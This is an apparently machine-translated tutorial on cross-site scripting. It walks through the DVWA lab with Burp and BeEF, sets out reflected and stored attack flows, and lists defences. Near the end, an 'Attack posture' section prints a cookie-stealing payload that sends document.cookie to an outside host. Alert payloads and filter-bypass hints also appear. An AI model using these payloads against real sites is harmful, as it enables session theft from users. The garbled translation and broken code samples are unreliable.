Shulou(Shulou.com)06/01 Report--

This article shows you how to understand XSS, the content is concise and easy to understand, can definitely make your eyes bright, through the detailed introduction of this article, I hope you can gain something.

XSS cross-site scripting attack (Cross Site Scripting) is to insert the Javascript code into the web page, and then when the user browses the page, the Javascript code embedded in the web page will be executed to achieve the purpose of attacking the user. In order to distinguish it from the cascading style sheets (CSS, Cascading Style Sheets) in HTML, it is called XSS.

The intrusion process of reflective XSS:

The attacker sends the URL containing malicious JavaScript code to the user = > the user opens the URL== > web application in response to the attacker's JavaScript = > the user browser sends session information to the attacker = > the attacker uses the session information to interact with the web server.

Attack steps:

(1) users log in to the web application normally, and get a cookie after logging in

(2) the attacker sends the URL containing the attack code to the user

(3) user opens URL

(4) the Web server executes the request of the user in the URL and executes the JavaScript code contained in the URL

(5) the attack code that an attacker can use can send the user's cookie information to cookie_save.php.

(6) after obtaining the user's cookie, the attacker can log in with this information.

Harm: you can construct a malicious pop-up window for the other browser, and you can add malicious code or malicious links to the XSS.

An analogy is alert ("XSS"). If you replace it with inframescr= http://127.0.0.1.exe), if http://127.0.0.1.exe is a Trojan horse, both the webmaster and the user who visit this page will be infected with Trojan horse.

Storage XSS intrusion process:

Web executes malicious code to construct URL== > users visit this website = > execute malicious JavaScript code in this browser = > return important parameters such as cookie to the attacker

Harm: you can get the user's information, cookie, etc.

In this XSS experiment, we use the pop-up window as a phenomenon. Why do we use pop-up windows here? because pop-up windows are the most obvious.

XSS reflection type

We open XSS (Reflection) in DVWA

And then we're in what's your name? Any input in it will return hello. Let's take 1 as an example.

We can also enter the XSS script here. Let's take alert (2) as an example.

We can construct a pop-up window, and we use burp to grab the bag and throw it into the scanner to scan it and get the following results.

Next, let's take a look at the report of this result.

Vulnerability details (Issue detail):

The value of the name request parameter is copied into the HTML document as plain text between tags. The name parameter has been submitted in its payload (arz4valert (1) pxrmb). Since this parameter is not filtered in the browser, Javascript can be injected into the application response

The level approach in DVWA is to bypass alert ("1") with nested inserts. In intermediate xss, tags are filtered, but not repeatedly.

Let's look at the intermediate code:

The highest-level method is 1. Using the _ Javascript:alert ("XSS") to encode can be bypassed.

Advanced code:

Storage XSS

There is a very important security mechanism in browsers called homology, which means that only things in the same domain can use cookie with each other. Cookie refers to the data (usually encrypted) stored on the user's local terminal by some websites in order to identify the user and carry out session tracking. Cookie is saved in the browser.

You can bypass it with the herf attribute in a stored XSS:

For example: link

Let's first open a tool called beef-XSS.

BeEF is a professional browser vulnerability exploitation framework for legitimate research and testing purposes. It allows experienced penetration testers or system administrators to attack targets and load browser hijacking sessions after successful attacks.

After we enter beef-xss on the terminal, not only the above interface will appear on the terminal, but also the browser page will appear. The account password of beEF on the web is all beef.

We enter it in the storage XSS of DVWA. The following interface appears in beef.

After this, we double-click 127.0.0.1 and go to this page.

Then we click Commands (command) and enter cookie here.

Then we enter and click get cookie.

Then click Execute. Then it will pop back to cookie and remove the quotation marks from the input.

Background of the question (Issue background):

When a data request is returned to the application response in an unsafe manner, we can judge that it is an emission to remove the quotation marks from the input

Type XSS. We can build a request, and if triggered by another user, the malicious Javascript code we write can run in the other browser. The Javascript code we write can do all kinds of operations, such as stealing cookie and logging in with the identity of the victim.

The mode of transmission of XSS

1. A link containing malicious URL can be sent to the victim by e-mail or some other means of communication

two。 Insert malicious Javascript code in the comment areas of some popular websites

3. You can create a website and make it visible to everyone so that users can launch XSS attacks (GET or POST requests) across domains.

The impact of XSS:

The extent to which XSS is affected depends on the person being attacked, and whether the data and functions it contains will affect others or other applications in the same domain. XSS is of little use if it is in an unimportant location, such as a place that is insensitive and has no authentication or controlled access. If it is in a critical place, such as cookie, it will threaten other applications and is judged to be dangerous. Similarly, if XSS is used for phishing, XSS will increase user trust and security software will not warn. Thus using Trojans for further attacks.

Defense strategy:

1. Strict verification is carried out at the place of input, such as the length of personal information and the matching of regular expressions in e-mail. That is what we commonly call the whitelist.

two。 HTML encodes the information of any location entered by the user, and replaces all the input by the user. Restrict users from using HTML tags and familiarity in applications.

3. Remove

Wait for the label.

4. Restrict input characters

5. Remove quotation marks from input

6. Decode the input URL and then encode it

7. Mark important cookie as http only

Attack posture

Steal the XSS code of cookie:

_ document.location=' [http://127.0.0.1/1.asp?msg=](http://127.0.0.1/1.asp?msg=)'+[xss_clean]] the above is how to understand XSS. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.